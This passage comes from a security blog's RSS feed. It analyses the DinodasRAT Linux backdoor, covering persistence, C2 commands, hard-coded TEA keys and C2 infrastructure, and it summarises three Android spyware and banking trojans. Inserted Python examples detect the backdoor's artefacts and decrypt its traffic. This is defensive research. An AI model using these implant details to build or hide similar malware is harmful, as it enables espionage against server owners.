  1212. <li>MD5 hash of the dmidecode command output (a detailed report of the infected system&#8217;s hardware);</li>
  1213. <li>Randomly generated number as ID;</li>
  1214. <li>Backdoor version.</li>
  1215. </ul>
  1216. <p>The unique identifier has the format: <strong>Linux_{DATE}_{HASH}_{RAND_NUM}_{VERSION}</strong>.</p>
  1217. <div id="attachment_112288" style="width: 763px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112288" class="size-full wp-image-112288" src="" alt="Machine unique identifier generation" width="753" height="176" srcset=" 753w, 300w, 740w" sizes="(max-width: 753px) 100vw, 753px" /></a><p id="caption-attachment-112288" class="wp-caption-text">Machine unique identifier generation</p></div>
  1218. <p>Next, the implant stores all the local information about the victim&#8217;s ID, privilege level, and any other relevant details in a hidden file called &#8220;<em>/etc/.netc.conf</em>&#8220;. This profile file contains the current collected metadata of the backdoor. If the file does not exist, Dinodas will create it, adhering to the <strong>Section</strong> and <strong>Key:Value</strong> structure.</p>
  1219. <div id="attachment_112289" style="width: 615px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112289" class="size-full wp-image-112289" src="" alt="DinodasRAT profile configuration" width="605" height="59" srcset=" 605w, 300w" sizes="(max-width: 605px) 100vw, 605px" /></a><p id="caption-attachment-112289" class="wp-caption-text">DinodasRAT profile configuration</p></div>
  1220. <p>It also ensures that any access to this file or to itself (when reading its own filepath) does not update the &#8220;access&#8221; time in the <em>stat</em> structure, which contains the access timestamp of a given file in the file system. It does this by using the &#8220;<strong>touch</strong>&#8221; command with the &#8220;<strong>-d</strong>&#8221; parameter to modify this metadata.</p>
  1221. <div id="attachment_112290" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112290" class="size-large wp-image-112290" src="" alt="Replacing the original file access time code" width="1024" height="256" srcset=" 1024w, 300w, 768w, 740w, 1118w, 800w, 1142w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112290" class="wp-caption-text">Replacing the original file access time code</p></div>
  1222. <div id="attachment_112291" style="width: 688px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112291" class="size-full wp-image-112291" src="" alt="Modified access time in the backdoor executable" width="678" height="163" srcset=" 678w, 300w" sizes="(max-width: 678px) 100vw, 678px" /></a><p id="caption-attachment-112291" class="wp-caption-text">Modified access time in the backdoor executable</p></div>
  1223. <p>The DinodasRAT Linux version takes advantage of the two versions of Linux service managers to establish persistence on an affected system: Systemd and SystemV. When the malware is launched, a function is called to determine the type of Linux distribution the victim is running. There are currently two flavors of distros that the implant targets based on its readings of &#8220;<em>/proc/version</em>&#8221; – RedHat and Ubuntu 16/18. However, the malware could infect any distro that supports either of the above versions of system service managers. Once the system is recognized, it installs a suitable init script that provides persistence for the RAT. This script is executed once the network setup is complete and launches the backdoor.</p>
  1224. <div id="attachment_112292" style="width: 890px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112292" class="size-full wp-image-112292" src="" alt="SystemD service registration" width="880" height="243" srcset=" 880w, 300w, 768w, 740w, 800w" sizes="(max-width: 880px) 100vw, 880px" /></a><p id="caption-attachment-112292" class="wp-caption-text">SystemD service registration</p></div>
  1225. <p>For RedHat, RedHat-based systems and Ubuntu, the service initiation scripts used for persistence check for the presence of the chkconfig binary. This is a way to indicate that the initialization is done with SysV instead of Systemd. If it doesn&#8217;t exist, the implant will open or create the script file &#8220;/etc/rc.d/rc.local&#8221; and append itself to the execution chain that runs the backdoor during system initialization. If it exists, the SysV route is implied and the malware creates the persistence scripts in &#8220;/etc/init.d&#8221;.</p>
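<p>As an added example (not part of the report), a small triage routine that checks a host description against the artefacts described above: the hidden <em>/etc/.netc.conf</em> profile file, the &#8220;.[executable_name].mu&#8221; companion file beside a launched binary, and binaries appended to <em>/etc/rc.d/rc.local</em>. It also validates a candidate victim identifier against the <strong>Linux_{DATE}_{HASH}_{RAND_NUM}_{VERSION}</strong> format; the per-field syntaxes (date as digits, hash as a 32-hex MD5, free-form version) are assumptions. The inputs returned by demo_inputs() are constructed, and the paths in them are made up.</p>

```python
"""Host triage for the DinodasRAT Linux artefacts (added example, not from the report)."""
import re
from pathlib import PurePosixPath

# Identifier format quoted in the article; field syntaxes are assumptions here.
VICTIM_ID_RE = re.compile(
    r"^Linux_(?P<date>\d{6,14})_(?P<hash>[0-9a-fA-F]{32})_(?P<rand>\d+)_(?P<version>[^_]+)$"
)
PROFILE_FILE = "/etc/.netc.conf"   # hidden profile file named in the article
RC_LOCAL = "/etc/rc.d/rc.local"    # appended to when chkconfig is absent


def parse_victim_id(text: str):
    """Split a candidate identifier into its fields, or None if it does not fit."""
    m = VICTIM_ID_RE.match(text)
    return m.groupdict() if m else None


def mutex_companions(listing) -> list:
    """Basenames X in one directory listing that have a sibling '.X.mu'."""
    names = set(listing)
    return sorted(n for n in names if not n.startswith(".") and f".{n}.mu" in names)


def rc_local_launchers(text: str) -> list:
    """Absolute paths executed from an rc.local file, ignoring comments and exit."""
    found = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("exit"):
            continue
        m = re.match(r"(/[^\s&;|]+)", line)
        if m:
            found.append(m.group(1))
    return found


def triage(rc_local_text: str, dir_listings: dict, present_files) -> list:
    """Combine the indicators into a list of human-readable findings.

    dir_listings maps a directory path to the basenames it contains;
    present_files is the set of absolute paths that exist on the host.
    """
    findings = []
    if PROFILE_FILE in set(present_files):
        findings.append(f"profile file present: {PROFILE_FILE}")
    for path in rc_local_launchers(rc_local_text):
        p = PurePosixPath(path)
        if p.name in mutex_companions(dir_listings.get(str(p.parent), [])):
            findings.append(f"{RC_LOCAL} launches {path}, which has a .{p.name}.mu sibling")
    return findings


def demo_inputs() -> tuple:
    """Constructed host state for the test; every path and name is made up."""
    rc_local = (
        "#!/bin/sh\n"
        "# constructed sample rc.local\n"
        "/usr/sbin/something --flag\n"
        "/opt/updater/agent &\n"
        "exit 0\n"
    )
    listings = {
        "/opt/updater": ["agent", ".agent.mu", "README"],
        "/usr/sbin": ["something"],
    }
    present = {PROFILE_FILE, "/opt/updater/agent", "/usr/sbin/something"}
    return rc_local, listings, present


if __name__ == "__main__":
    for finding in triage(*demo_inputs()):
        print(finding)
```

<p>The mutex-file check is the most robust of the three on its own, since the companion file is created wherever the binary is dropped; the rc.local check only covers the SysV-less branch described above, so a SysV host would need the equivalent pass over <em>/etc/init.d</em>.</p>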
  1226. <h2 id="c2-communication">C2 Communication</h2>
  1227. <p>The Linux version of DinodasRAT communicates with the C2 in the same way as the Windows version. It communicates over TCP or UDP. The C2 domain is hard-coded into the binary:</p>
  1228. <div id="attachment_112293" style="width: 472px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112293" class="size-full wp-image-112293" src="" alt="C2 server and port are hard-coded into the implant" width="462" height="311" srcset=" 462w, 300w, 416w" sizes="(max-width: 462px) 100vw, 462px" /></a><p id="caption-attachment-112293" class="wp-caption-text">C2 server and port are hard-coded into the implant</p></div>
  1229. <p>DinodasRAT has a timed interval for sending the information back to the C2, although it is not a fixed interval for all users or all connections. If the user executing the implant is root (EUID = 0), the implant doesn&#8217;t wait to send the information back to the C2. In the case of a non-superuser with the configuration set to <em>checkroot</em>, it will wait two minutes for a &#8220;short&#8221; wait (default) and 10 hours for a &#8220;long&#8221; wait. The &#8220;long&#8221; wait is triggered when there&#8217;s a remote connection to the infected server coming from one of the C2-configured IP addresses.</p>
  1230. <p>To communicate with the C2 server and send any information, the implant follows a network packet structure with many fields, but here are the relevant fields of the structure:</p>
  1231. <div id="attachment_112294" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112294" class="size-large wp-image-112294" src="" alt="Simplified version of Dinodas network packet" width="1024" height="315" srcset=" 1024w, 300w, 768w, 1536w, 1137w, 740w, 909w, 800w, 1955w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112294" class="wp-caption-text">Simplified version of Dinodas network packet</p></div>
  1232. <p>Here&#8217;s a list of C2 commands that DinodasRAT recognizes:</p>
  1233. <table width="100%">
  1234. <tbody>
  1235. <tr>
  1236. <td style="background-color: #cccccc;padding-left: 5px" width="10%"><strong>ID</strong></td>
  1237. <td style="background-color: #cccccc;padding-left: 5px" width="30%"><strong>Function</strong></td>
  1238. <td style="background-color: #cccccc;padding-left: 5px" width="60%"><strong>Command</strong></td>
  1239. </tr>
  1240. <tr>
  1241. <td style="padding-left: 5px">0x02</td>
  1242. <td style="padding-left: 5px">DirClass</td>
  1243. <td style="padding-left: 5px">List the directory content.</td>
  1244. </tr>
  1245. <tr>
  1246. <td style="padding-left: 5px">0x03</td>
  1247. <td style="padding-left: 5px">DelDir</td>
  1248. <td style="padding-left: 5px">Delete directory.</td>
  1249. </tr>
  1250. <tr>
  1251. <td style="padding-left: 5px">0x05</td>
  1252. <td style="padding-left: 5px">UpLoadFile</td>
  1253. <td style="padding-left: 5px">Upload a file to the C2.</td>
  1254. </tr>
  1255. <tr>
  1256. <td style="padding-left: 5px">0x06</td>
  1257. <td style="padding-left: 5px">StopDownLoadFile</td>
  1258. <td style="padding-left: 5px">Stop file upload.</td>
  1259. </tr>
  1260. <tr>
  1261. <td style="padding-left: 5px">0x08</td>
  1262. <td style="padding-left: 5px">DownLoadFile</td>
  1263. <td style="padding-left: 5px">Download remote file to system.</td>
  1264. </tr>
  1265. <tr>
  1266. <td style="padding-left: 5px">0x09</td>
  1267. <td style="padding-left: 5px">StopDownFile</td>
  1268. <td style="padding-left: 5px">Stop file download.</td>
  1269. </tr>
  1270. <tr>
  1271. <td style="padding-left: 5px">0x0E</td>
  1272. <td style="padding-left: 5px">DealChgIp</td>
  1273. <td style="padding-left: 5px">Change C2 remote address.</td>
  1274. </tr>
  1275. <tr>
  1276. <td style="padding-left: 5px">0x0F</td>
  1277. <td style="padding-left: 5px">CheckUserLogin</td>
  1278. <td style="padding-left: 5px">Check logged-in users.</td>
  1279. </tr>
  1280. <tr>
  1281. <td style="padding-left: 5px">0x11</td>
  1282. <td style="padding-left: 5px">EnumProcess</td>
  1283. <td style="padding-left: 5px">Enumerate running processes.</td>
  1284. </tr>
  1285. <tr>
  1286. <td style="padding-left: 5px">0x12</td>
  1287. <td style="padding-left: 5px">StopProcess</td>
  1288. <td style="padding-left: 5px">Kill a running process.</td>
  1289. </tr>
  1290. <tr>
  1291. <td style="padding-left: 5px">0x13</td>
  1292. <td style="padding-left: 5px">EnumService</td>
  1293. <td style="padding-left: 5px">Use chkconfig and enumerate all available services.</td>
  1294. </tr>
  1295. <tr>
  1296. <td style="padding-left: 5px">0x14</td>
  1297. <td style="padding-left: 5px">ControlService</td>
  1298. <td style="padding-left: 5px">Control an available service. If 1 is passed as an argument, it will start a service, 0 will stop it, while 2 will stop and delete the service.</td>
  1299. </tr>
  1300. <tr>
  1301. <td style="padding-left: 5px">0x18</td>
  1302. <td style="padding-left: 5px">DealExShell</td>
  1303. <td style="padding-left: 5px">Execute shell command and send its output to C2.</td>
  1304. </tr>
  1305. <tr>
  1306. <td style="padding-left: 5px">0x19</td>
  1307. <td style="padding-left: 5px">ExecuteFile</td>
  1308. <td style="padding-left: 5px">Execute a specified file path in a separate thread.</td>
  1309. </tr>
  1310. <tr>
  1311. <td style="padding-left: 5px">0x1A</td>
  1312. <td style="padding-left: 5px">DealProxy</td>
  1313. <td style="padding-left: 5px">Proxy C2 communication through a remote proxy.</td>
  1314. </tr>
  1315. <tr>
  1316. <td style="padding-left: 5px">0x1B</td>
  1317. <td style="padding-left: 5px">StartShell</td>
  1318. <td style="padding-left: 5px">Drop a shell for the threat actor to interact with.</td>
  1319. </tr>
  1320. <tr>
  1321. <td style="padding-left: 5px">0x1C</td>
  1322. <td style="padding-left: 5px">ReRestartShell</td>
  1323. <td style="padding-left: 5px">Restart the previously mentioned shell.</td>
  1324. </tr>
  1325. <tr>
  1326. <td style="padding-left: 5px">0x1D</td>
  1327. <td style="padding-left: 5px">StopShell</td>
  1328. <td style="padding-left: 5px">Stop the execution of the current shell.</td>
  1329. </tr>
  1330. <tr>
  1331. <td style="padding-left: 5px">0x1E</td>
  1332. <td style="padding-left: 5px">WriteShell</td>
  1333. <td style="padding-left: 5px">Write commands into the current shell or create one if necessary.</td>
  1334. </tr>
  1335. <tr>
  1336. <td style="padding-left: 5px">0x27</td>
  1337. <td style="padding-left: 5px">DealFile</td>
  1338. <td style="padding-left: 5px">Download and set up a new version of the implant.</td>
  1339. </tr>
  1340. <tr>
  1341. <td style="padding-left: 5px">0x28</td>
  1342. <td style="padding-left: 5px">DealLocalProxy</td>
  1343. <td style="padding-left: 5px">Send &#8220;ok&#8221;.</td>
  1344. </tr>
  1345. <tr>
  1346. <td style="padding-left: 5px">0x2B</td>
  1347. <td style="padding-left: 5px">ConnectCtl</td>
  1348. <td style="padding-left: 5px">Control connection type.</td>
  1349. </tr>
  1350. <tr>
  1351. <td style="padding-left: 5px">0x2C</td>
  1352. <td style="padding-left: 5px">ProxyCtl</td>
  1353. <td style="padding-left: 5px">Control proxy type.</td>
  1354. </tr>
  1355. <tr>
  1356. <td style="padding-left: 5px">0x2D</td>
  1357. <td style="padding-left: 5px">Trans_mode</td>
  1358. <td style="padding-left: 5px">Set or get file transfer mode (TCP/UDP).</td>
  1359. </tr>
  1360. <tr>
  1361. <td style="padding-left: 5px">0x2E</td>
  1362. <td style="padding-left: 5px">Uninstall</td>
  1363. <td style="padding-left: 5px">Uninstall the implant and delete any artifacts from the system.</td>
  1364. </tr>
  1365. </tbody>
  1366. </table>
  1367. <div id="attachment_112295" style="width: 299px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112295" class="size-full wp-image-112295" src="" alt="Command to uninstall itself from the infected system" width="289" height="233" /></a><p id="caption-attachment-112295" class="wp-caption-text">Command to uninstall itself from the infected system</p></div>
  1368. <h2 id="encryption">Encryption</h2>
  1369. <p>The Linux version of DinodasRAT also shares encryption characteristics with the Windows version. For encryption and decryption of communication between the implant and the C2, as well as encryption of data, it uses Pidgin&#8217;s <a href="" target="_blank" rel="noopener">libqq</a> qq_crypt library functions. This library uses the Tiny Encryption Algorithm (<a href="" target="_blank" rel="noopener">TEA</a>) in <a href="" target="_blank" rel="noopener">CBC</a> mode to cipher and decipher the data, which makes it fairly easy to port between platforms. The Linux implant also shares two of the keys used in the Windows version:</p><pre class="crayon-plain-tag">For C2 encryption:   A1 A1 18 AA 10 F0 FA 16 06 71 B3 08 AA AF 31 A1
1370. For name encryption: A0 21 A1 FA 18 E0 C1 30 1F 9F C0 A1 A0 A6 6F B1</pre>
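<p>To make the construction above concrete, here is an added example written for this edit; it is not the implant's code and not the qq_crypt routine from Pidgin's libqq. It implements the TEA block cipher (big-endian words, Feistel rounds with the 0x9E3779B9 delta) and chains it in CBC mode with PKCS#7-style padding and a zero IV, using the two keys printed above. The padding and IV are the editor's assumptions: the real qq_crypt framing (its random padding header and the 16-round variant of the cipher) should be checked against qq_crypt.c before using this on captured traffic, which is why the round count is a parameter. The <code>candidate_plaintexts</code> helper shows the triage step an analyst actually wants: try each hard-coded key and keep the outputs that pad correctly.</p>

```python
import struct

DELTA = 0x9E3779B9
MASK32 = 0xFFFFFFFF

# The two 128-bit keys printed in the article (shared with the Windows build).
C2_KEY = bytes.fromhex("A1A118AA10F0FA160671B308AAAF31A1")
NAME_KEY = bytes.fromhex("A021A1FA18E0C1301F9FC0A1A0A66FB1")


def tea_encipher(block, key, rounds=32):
    """Encrypt one 8-byte block with TEA (big-endian words, `rounds` Feistel rounds)."""
    v0, v1 = struct.unpack(">2I", block)
    k0, k1, k2, k3 = struct.unpack(">4I", key)
    total = 0
    for _ in range(rounds):
        total = (total + DELTA) & MASK32
        v0 = (v0 + (((v1 << 4) + k0) ^ (v1 + total) ^ ((v1 >> 5) + k1))) & MASK32
        v1 = (v1 + (((v0 << 4) + k2) ^ (v0 + total) ^ ((v0 >> 5) + k3))) & MASK32
    return struct.pack(">2I", v0, v1)


def tea_decipher(block, key, rounds=32):
    """Invert tea_encipher by undoing the rounds in reverse order."""
    v0, v1 = struct.unpack(">2I", block)
    k0, k1, k2, k3 = struct.unpack(">4I", key)
    total = (DELTA * rounds) & MASK32
    for _ in range(rounds):
        v1 = (v1 - (((v0 << 4) + k2) ^ (v0 + total) ^ ((v0 >> 5) + k3))) & MASK32
        v0 = (v0 - (((v1 << 4) + k0) ^ (v1 + total) ^ ((v1 >> 5) + k1))) & MASK32
        total = (total - DELTA) & MASK32
    return struct.pack(">2I", v0, v1)


def tea_cbc_encrypt(plaintext, key, iv=bytes(8), rounds=32):
    """CBC-chain TEA over PKCS#7-padded data (assumed framing, not qq_crypt's header)."""
    pad = 8 - len(plaintext) % 8
    data = plaintext + bytes([pad]) * pad
    prev, out = iv, bytearray()
    for i in range(0, len(data), 8):
        prev = tea_encipher(bytes(a ^ b for a, b in zip(data[i:i + 8], prev)), key, rounds)
        out += prev
    return bytes(out)


def tea_cbc_decrypt(ciphertext, key, iv=bytes(8), rounds=32):
    """Inverse of tea_cbc_encrypt; raises ValueError on a bad length or bad padding."""
    if not ciphertext or len(ciphertext) % 8:
        raise ValueError("ciphertext must be a non-empty multiple of 8 bytes")
    prev, out = iv, bytearray()
    for i in range(0, len(ciphertext), 8):
        cur = ciphertext[i:i + 8]
        out += bytes(a ^ b for a, b in zip(tea_decipher(cur, key, rounds), prev))
        prev = cur
    pad = out[-1]
    if not 1 <= pad <= 8 or out[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding (wrong key or corrupted data)")
    return bytes(out[:-pad])


def candidate_plaintexts(ciphertext, keys=None, rounds=32):
    """Triage helper: try each hard-coded key, keep the outputs whose padding checks out."""
    keys = keys or {"c2": C2_KEY, "name": NAME_KEY}
    hits = {}
    for label, key in keys.items():
        try:
            hits[label] = tea_cbc_decrypt(ciphertext, key, rounds=rounds)
        except ValueError:
            continue
    return hits


if __name__ == "__main__":
    # Constructed sample beacon body, not a captured DinodasRAT packet.
    msg = b"uid=deadbeef;host=srv01"
    blob = tea_cbc_encrypt(msg, C2_KEY)
    print(blob.hex())
    print(candidate_plaintexts(blob))
```

<p>Because both keys are hard-coded and shared across the Windows and Linux builds, a padding check after decryption is enough to tell which key a given blob was produced with; a padding failure with both keys usually means the framing differs from the assumed one rather than that the keys have changed.</p>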
  1371. <h2 id="infrastructure">Infrastructure</h2>
  1372. <table width="100%">
  1373. <tbody>
  1374. <tr>
  1375. <td style="background-color: #cccccc;padding-left: 5px" width="25%"><strong>Domain</strong></td>
  1376. <td style="background-color: #cccccc;padding-left: 5px" width="25%"><strong>IP</strong></td>
  1377. <td style="background-color: #cccccc;padding-left: 5px" width="20%"><strong>First seen</strong></td>
  1378. <td style="background-color: #cccccc;padding-left: 5px" width="10%"><strong>ASN</strong></td>
  1379. <td style="background-color: #cccccc;padding-left: 5px" width="20%"><strong>Registrar</strong></td>
  1380. </tr>
  1381. <tr>
  1382. <td style="padding-left: 5px">update.centos-yum[.]com</td>
  1383. <td style="padding-left: 5px">199.231.211[.]19</td>
  1384. <td style="padding-left: 5px">May 4, 2022</td>
  1385. <td style="padding-left: 5px">18978</td>
  1386. <td style="padding-left: 5px">, Inc.</td>
  1387. </tr>
  1388. </tbody>
  1389. </table>
1390. <p>The infrastructure used by the Linux versions of DinodasRAT was still up and running while this implant was being analyzed. We identified one IP address shared by the C2 domains of the Windows and Linux variants: the Windows version uses the domain[.]com, which resolves to 199.231.211[.]19, and the Linux C2 domain update.centos-yum[.]com resolves to the same address. Both domains (interestingly enough) follow the same naming pattern: an operating system update subdomain under a lookalike domain.</p>
  1391. <h2 id="victims">Victims</h2>
  1392. <p>In our telemetry data and continuous monitoring of this threat since October 2023, we&#8217;ve observed that the most affected countries and territories are China, Taiwan, Turkey and Uzbekistan.</p>
  1393. <p>All Kaspersky products detect this Linux variant as <strong>HEUR:Backdoor.Linux.Dinodas.a.</strong></p>
  1394. <h2 id="conclusion">Conclusion</h2>
1395. <p>In October 2023, ESET published an article about a campaign dubbed Operation Jacana targeting Windows users. As part of our ongoing monitoring efforts, we discovered that the Jacana operators possess, and act on, the ability to infect Linux infrastructure with a new, previously unknown and undetected Linux DinodasRAT variant whose code and network indicators of compromise overlap with the Windows samples described by ESET. The implant does not collect user information to manage infections. Instead, it collects hardware-specific information and uses it to generate a UID, which suggests that DinodasRAT&#8217;s primary use case is to gain and maintain access via Linux servers rather than reconnaissance.</p>
  1396. <p>The backdoor is fully functional, granting the operator complete control over the infected machine, enabling data exfiltration and espionage.</p>
  1397. <p>A more detailed analysis of the latest DinodasRAT versions is available to customers of our private <a href="" target="_blank" rel="noopener">Threat Intelligence reports</a>. If you have any questions, please contact <strong><a href="" target="_blank" rel="noopener"></a>.</strong></p>
  1398. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1399. <p><strong>Host-based:</strong></p>
  1400. <ul>
  1401. <li><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">8138f1af1dc51cde924aa2360f12d650</a></li>
  1402. <li><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">decd6b94792a22119e1b5a1ed99e8961</a></li>
  1403. </ul>
  1404. <p><strong>Network-based:</strong></p>
  1405. <ul>
  1406. <li><a href=";utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">update.centos-yum[.]com</a> (199.231.211[.]19)</li>
  1407. </ul>
  1408. ]]></content:encoded>
  1409. <wfw:commentRss></wfw:commentRss>
  1410. <slash:comments>0</slash:comments>
  1411. <media:content xmlns:media="" url="" width="2600" height="1321"><media:keywords>full</media:keywords></media:content>
  1412. <media:content xmlns:media="" url="" width="1024" height="520"><media:keywords>large</media:keywords></media:content>
  1413. <media:content xmlns:media="" url="" width="300" height="152"><media:keywords>medium</media:keywords></media:content>
  1414. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1415. </item>
  1416. <item>
  1417. <title>Android malware, Android malware and more Android malware</title>
  1418. <link></link>
  1419. <comments></comments>
  1420. <dc:creator><![CDATA[GReAT]]></dc:creator>
  1421. <pubDate>Wed, 20 Mar 2024 11:00:34 +0000</pubDate>
  1422. <category><![CDATA[Malware reports]]></category>
  1423. <category><![CDATA[Google Android]]></category>
  1424. <category><![CDATA[Malware]]></category>
  1425. <category><![CDATA[RAT Trojan]]></category>
  1426. <category><![CDATA[Spyware]]></category>
  1427. <category><![CDATA[Trojan]]></category>
  1428. <category><![CDATA[Mobile threats]]></category>
  1429. <guid isPermaLink="false"></guid>
  1431. <description><![CDATA[In this report, we share our latest Android malware findings: the Tambir spyware, Dwphon downloader and Gigabud banking Trojan.]]></description>
  1432. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
1433. <p>Malware for mobile devices is something we come across very often. <a href="">In 2023</a>, our technologies blocked 33.8 million malware, adware, and riskware attacks on mobile devices. One of 2023&#8217;s most high-profile attacks was <a href="">Operation Triangulation</a>, targeting iOS, but that was rather a unique case. Among the mobile platforms, Android remains the most popular target operating system for cybercriminals. Last month, we wrote a total of four private crimeware reports on Android malware, three of which are summarized below.</p>
  1434. <p>To learn more about our crimeware reporting service, you can contact us at <a href="" target="_blank" rel="noopener"></a>.</p>
  1435. <h2 id="tambir">Tambir</h2>
  1436. <p>Tambir is an Android backdoor that targets users in Turkey. It disguises itself as an IPTV app, but does not manifest any such functionality. Instead, it is a full-fledged spyware application that collects SMS messages, keystrokes, etc.</p>
  1437. <p>Upon starting, the application shows a screen that asks the user in Turkish to enable the accessibility service. Once it is granted all the permissions, the app obtains a C2 address from a public source, such as Telegram, ICQ or Twitter/X. Next, the application shapeshifts by changing its icon to that of YouTube.</p>
  1438. <div id="attachment_112126" style="width: 316px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112126" class="size-full wp-image-112126" src="" alt="Encrypted C2 address in a chat invitation" width="306" height="365" srcset=" 306w, 252w, 168w, 293w, 235w" sizes="(max-width: 306px) 100vw, 306px" /></a><p id="caption-attachment-112126" class="wp-caption-text">Encrypted C2 address in a chat invitation</p></div>
1439. <p>Tambir supports more than 30 commands that it can retrieve from the C2. These include starting and stopping the keylogger, running an application specified by the attacker, sending SMS messages, dialing a number and so on.</p>
  1440. <p>We found certain similarities between Tambir and the <a href="" target="_blank" rel="noopener">GodFather malware</a>. They both target users in Turkey and both support Telegram for retrieving a C2 server address. However, Tambir has a much richer feature set.</p>
  1441. <h2 id="dwphon">Dwphon</h2>
1442. <p>In November 2023, we stumbled upon an Android malware variant targeting mobile phones by various Chinese OEM manufacturers. Their products were primarily intended for the Russian market. The same malware had earlier been found in the firmware of a kids&#8217; smart watch by an Israeli manufacturer distributed mainly in Europe and the Middle East.</p>
  1443. <p>Dwphon comes as a component of the system update application and exhibits many characteristics of pre-installed Android malware. For example, it collects device and personal information, as well as information about third-party applications installed on the device. The exact infection path is unclear, but there is an assumption that the infected application was incorporated into the firmware as a result of a possible supply chain attack.</p>
  1444. <p>The malware itself consists of a number of modules that provide a range of functions:</p>
  1445. <ul>
  1446. <li>Main module. Collects system information (e.g. IMSI, system language, etc.) and sends it to the C2. Commands that can be received are related to installing, downloading and deleting apps on the device, downloading files, and showing popups, among others.</li>
  1447. <li>DsSdk module. Another module that collects device information. The module has its own C2 and is unable to receive commands.</li>
  1448. <li>ExtEnabler module. This module starts and monitors other applications. Part of the module&#8217;s functionality is sending a broadcast message when an application is started. Some of the samples we investigated did not contain any receiver code. We did, however, find one sample that contained it. This sample includes the <a href="" target="_blank" rel="noopener">Triada Trojan</a>, which suggests a link between Dwphon and Triada, although there is insufficient evidence to support this.</li>
  1449. </ul>
  1450. <h2 id="gigabud">Gigabud</h2>
1451. <p>Gigabud is an Android RAT (Remote Access Trojan), active since at least mid-2022 and first discovered in January 2023. Focused on stealing banking credentials from individuals in Southeast Asia, it initially mimicked a local airline app, but later crossed borders into other countries, such as Peru, and also changed its disguise to that of a fake loan app.</p>
  1452. <p>Gigabud is written in Kotlin, and obfuscated with Dexguard and later Virbox. Its various versions mimic apps created by companies in Thailand and Peru among others. Upon starting, the application shows the login screen of the app it mimics and subsequently sends the credentials, along with device information, to the C2. Next, it shows a virtual assistant, which guides the victim to apply for a loan.</p>
  1453. <p>It then continues by requesting the accessibility feature to be enabled – if it isn&#8217;t already. It needs this to steal credentials and mimic touch events for bypassing 2FA.</p>
  1454. <div id="attachment_112129" style="width: 1026px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112129" class="size-full wp-image-112129" src="" alt="Scheme of the captured data" width="1016" height="414" srcset=" 1016w, 300w, 768w, 859w, 740w, 687w, 800w" sizes="(max-width: 1016px) 100vw, 1016px" /></a><p id="caption-attachment-112129" class="wp-caption-text">Scheme of the captured data</p></div>
1455. <p>Apart from stealing credentials from the login screen, Gigabud embeds a screen recording module that streams the screen to the C2 over WebSocket or RTMP, giving the operator another way to capture what the victim enters on the infected device.</p>
  1456. <p>Gigabud contains various Chinese language artifacts. For example, the log messages are written in Chinese, the APK signature is in Chinese, and the C2 servers are located in China.</p>
  1457. <h2 id="conclusion">Conclusion</h2>
  1458. <p>In 2023, we detected more than 1.3 million unique malicious installation packages targeting the Android platform and distributed in various ways. Users can protect themselves by not downloading apps from unofficial app marketplaces and by carefully reviewing the permissions that apps request. Frequently, apps do not embed any exploitation functionality and thus solely rely on the user giving them permissions. Additionally, antimalware tools help to keep your Android device clean. </p>
  1459. <p>If you would like to stay up to date on the latest TTPs being used by criminals, or if you have questions about our private reports, you can contact us at <a href="" target="_blank" rel="noopener"></a>.</p>
  1460. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1461. <p><strong>Gigabud</strong><br />
  1462. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">043020302ea8d134afbd5bd37c05d2a8</a><br />
  1463. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">0960de9d425b5157720f59c2901d4e3b</a><br />
  1464. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">0677a090eb28837b1bbf3e6ab1822fdd</a></p>
  1465. <p><strong>Dwphon</strong><br />
  1466. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">042f041108a79ac07d7b3165531faa9a</a><br />
  1467. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">1796e678498bf9a067c43769f4096488</a><br />
  1468. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">274b8d86042d94a6ca6823841fec6d2c</a></p>
  1469. <p><strong>Tambir</strong><br />
  1470. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">04807757a54ce0fbc8326ea8b11f8169</a><br />
  1471. <a href=";utm_medium=SL&amp;utm_campaign=SL target=" rel="noopener">06148a2e5828e6844c2a1a74030d22b6</a><br />
  1472. <a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">098dac0668497d9707045bc1e10ced93</a></p>
  1473. ]]></content:encoded>
  1474. <wfw:commentRss></wfw:commentRss>
  1475. <slash:comments>0</slash:comments>
